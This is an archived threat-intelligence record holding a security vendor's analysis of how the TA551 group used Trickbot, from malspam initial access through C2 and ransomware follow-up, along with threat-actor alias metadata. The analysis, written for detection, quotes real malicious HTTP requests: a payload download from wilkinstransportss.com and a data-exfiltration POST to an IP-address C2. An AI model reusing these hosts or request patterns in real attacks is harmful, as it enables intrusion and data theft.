{ "id": "09b57e23-d3e1-4550-9a4a-006a5f8fb10a", "created_at": "2026-04-06T00:09:31.946251Z", "updated_at": "2026-04-10T13:11:24.664032Z", "deleted_at": null, "sha1_hash": "a8c815f4d386e3f721362269349def2b12027177", "title": "Malware Analysis: Trickbot", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 180067, "plain_text": "Malware Analysis: Trickbot\r\nBy The Hacker News\r\nPublished: 2022-05-24 · Archived: 2026-04-05 20:11:34 UTC\r\nIn this day and age, we are not dealing with roughly pieced together, homebrew type of viruses anymore. Malware\r\nis an industry, and professional developers are found to exchange, be it by stealing one's code or deliberate\r\ncollaboration. Attacks are multi-layer these days, with diverse sophisticated software apps taking over different\r\njobs along the attack-chain from initial compromise to ultimate data exfiltration or encryption. The specific tools\r\nfor each stage are highly specialized and can often be rented as a service, including customer support and\r\nsubscription models for professional (ab)use. Obviously, this has largely increased both the availability and the\r\npotential effectiveness and impact of malware. Sound scary? \r\nWell, it does, but the apparent professionalization actually does have some good sides too. One factor is that\r\ncertain reused modules commonly found in malware can be used to identify, track, and analyze professional attack\r\nsoftware. Ultimately this means that, with enough experience, skilled analysts can detect and stop malware in its\r\ntracks, often with minimal or no damage (if the attackers make it through the first defense lines at all).\r\nLet's see this mechanic in action as we follow an actual CyberSOC analyst investigating the case of the malware\r\ndubbed \"Trickbot.\"\r\nOrigins of Trickbot\r\nOrange Cyberdefense's CyberSOCs have been tracking the specific malware named Trickbot for quite some time.\r\nIt is commonly attributed to a specific Threat Actor generally known under the name of Wizard Spider\r\nhttps://thehackernews.com/2022/05/malware-analysis-trickbot.html\r\nPage 1 of 5\n\n(Crowdstrike), UNC1778 (FireEye) or Gold Blackburn (Secureworks).\r\nTrickbot is a popular and modular Trojan initially used in targeting the banking industry, that has meanwhile been\r\nused to compromise companies from other industries as well. It delivers several types of payloads. Trickbot\r\nevolved progressively to be used as Malware-as-a-Service (MaaS) by different attack groups.\r\nThe threat actor behind it is known to act quickly, using the well-known post-exploitation tool Cobalt Strike to\r\nmove laterally on the company network infrastructure and deploy ransomware like Ryuk or Conti as a final stage.\r\nAs it is used for initial access, being able to detect this threat as quickly as possible is a key element of success for\r\npreventing further attacks.\r\nThis threat analysis will be focused on the threat actor named TA551, and its use of Trickbot as an example. I will\r\npresent how we are able to perform detection at the different steps of the kill chain, starting from the initial\r\ninfection through malspam campaigns, moving on to the detection of tools used by the threat actor during\r\ncompromise. We will also provide some additional information about how the threat actor is using this malware\r\nand the evolution it took.\r\n1 — Initial access\r\nSince June 2021, the group TA551 started delivering the Trickbot malware using an encrypted zip. The email\r\npretext mimics an important information to reduce the vigilance of the user.\r\nThe attachment includes a .zip file which again includes a document. The zip file always uses the same name as\r\n\"request.zip\" or \"info.zip\", and the same name for the document file.\r\nNB: The Threat Actor used the same modus operandi before/in parallel to Trickbot to deliver other malware. We\r\nobserved during the same period, from June 2021 to September 2021, the use of Bazarloader on the initial access\r\npayload.\r\n2 — Execution\r\nWhen the user opens the document with macros enabled, an HTA file will be dropped on the system and launched\r\nusing cmd.exe. The HTA file is used to download the Trickbot DLL from a remote server.\r\nThis behavior is related to TA551, we can identify it with the pattern \"/bdfh/\" in the GET request.\r\nGET /bdfh/M8v[..]VUb HTTP/1.1\r\nAccept: */*\r\nHost: wilkinstransportss.com\r\nContent-Type: application/octet-stream\r\nNB: Patterns related to TA551 evolved with time, since mid-August 2021, the pattern changed to \"/bmdff/\". The\r\nDLL is registered as a jpg file to hide the real extension, and it tries to be run via regsvr32.exe. Then, Trickbot will\r\nbe injected into \"wermgr.exe\" using Process Hollowing techniques.\r\nhttps://thehackernews.com/2022/05/malware-analysis-trickbot.html\r\nPage 2 of 5\n\nFigure 1 - Trickbot execution in the sandbox\r\n3 — Collection\r\nAfter the successful initial system compromise, Trickbot can collect a lot of information about its target using\r\nlegitimate Windows executables and identify if the system is member of an Active Directory domain. \r\nAdditionally, to this collection, Trickbot will scan more information like Windows build, the public IP address, the\r\nuser that is running Trickbot, and also if the system is behind an NAT firewall.\r\nTrickbot is also able to collect sensitive information like banking data or credentials, and exfiltrate it to a\r\ndedicated command and control server (C2).\r\n4 — Command \u0026 Control\r\nWhen the system is infected, it can contact several kinds of Trickbot C2. The main C2 is the one with which the\r\nvictim system will communicate, mainly to get new instructions.\r\nAll requests to a Trickbot C2 use the following format:\r\n\"/\u003cgtag\u003e/\u003cClient_ID\u003e/\u003ccommand\u003e/\u003cadditionnal \r\ninformation about the command\u003e/\"\r\nGET /zev4/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787/0/Windows 10\r\nx64/1108/XX.XX.XX.XX/38245433F0E3D5689F6EE84483106F4382CC92EAFAD5120\r\n6571D97A519A2EF29/0bqjxzSOQUSLPRJMQSWKDHTHKEG/ HTTP/1.1\r\nhttps://thehackernews.com/2022/05/malware-analysis-trickbot.html\r\nPage 3 of 5\n\nConnection: Keep-Alive\r\nUser-Agent: curl/7.74.0\r\nHost: 202.165.47.106\r\nAll data collected is sent to a separate Exfiltration Trickbot C2 using HTTP POST request methods. The request\r\nformat keeps the same, but the command \"90\" is specific to data exfiltration, more precisely system data collected\r\noff the infected system.\r\nPOST /zev4/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787/90/ HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: multipart/form-data; boundary=------Bound\r\nary0F79C562\r\nUser-Agent: Ghost\r\nHost: 24.242.237.172:443\r\nFollow-up attacks: Cobalt Strike, Ryuk, Conti\r\nCobalt Strike[1] is a commercial, fully-featured, remote access tool that calls itself an \"adversary simulation\r\nsoftware designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors\".\r\nCobalt Strike's interactive post-exploit capabilities cover the full range of ATT\u0026CK tactics, all executed within a\r\nsingle, integrated system.\r\nIn our context, Trickbot uses the highjacked wermgr.exe process to load a Cobalt Strike beacon into memory.\r\nSeveral ransomware operators are affiliated to the threat actors as well. The aim of Trickbot is to perform the\r\ninitial access preceding the actual ransomware attack. Conti and Ryuk are the main ransomwares observed on the\r\nfinal stage of Trickbot infections, though by far not the only ones. Conti is a group that operates a Ransomware-as-a-Service model and is available to several affiliate threat actors. Ryuk on the other hand is a ransomware that\r\nis linked directly to the threat actor behind Trickbot.\r\nKey learnings\r\nThreat actors often still use basic techniques to get into the network like phishing emails. Raising awareness about\r\nphishing is definitely a great first step in building up cyber resilience. The best attacks are, after all, the ones that\r\nnever even get started.\r\nOf course, there is no such thing as bullet-proof preventive protection in cyber. It's all the more important to have\r\nthe capability of detecting Trickbot at an early stage. Though the attack chain can be broken at every stage along\r\nthe way: the later it is, the higher the risk of full compromise and the resulting damage. Trickbot is used by\r\nhttps://thehackernews.com/2022/05/malware-analysis-trickbot.html\r\nPage 4 of 5\n\ndifferent threat actors, but the detection approach stays the same on most of its specific stages. Some of the\r\nindicators of compromise are explained here. But malware gets updates too. \r\nAnalysts have to stay vigilant. Tracking and watching a specific malware or a threat actor is a key to follow its\r\nevolution, improvement, and keep up to date about an efficient detection of the threat.\r\nThis is a story from the trenches found in the Security Navigator. More malware analysis and other interesting\r\nstuff including accounts of emergency response operations and a criminal scientist's view on cyber extortion, as\r\nwell as tons of facts and figures on the security landscape in general can be found there as well. The full report is\r\navailable for download on the Orange Cyberdefense website, so have a look. It's worth it!\r\n[1] MITRE ATT\u0026CK Cobaltstrike : https://attack.mitre.org/software/S0154/\r\nThis article was written by Florian Goutin, CyberSOC analyst at Orange Cyberdefense.\r\nFound this article interesting? This article is a contributed piece from one of our valued partners. Follow us on\r\nGoogle News, Twitter and LinkedIn to read more exclusive content we post.\r\nSource: https://thehackernews.com/2022/05/malware-analysis-trickbot.html\r\nhttps://thehackernews.com/2022/05/malware-analysis-trickbot.html\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html" ], "report_names": [ "malware-analysis-trickbot.html" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434171, "ts_updated_at": 1775826684, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a8c815f4d386e3f721362269349def2b12027177.pdf", "text": "https://archive.orkl.eu/a8c815f4d386e3f721362269349def2b12027177.txt", "img": "https://archive.orkl.eu/a8c815f4d386e3f721362269349def2b12027177.jpg" } }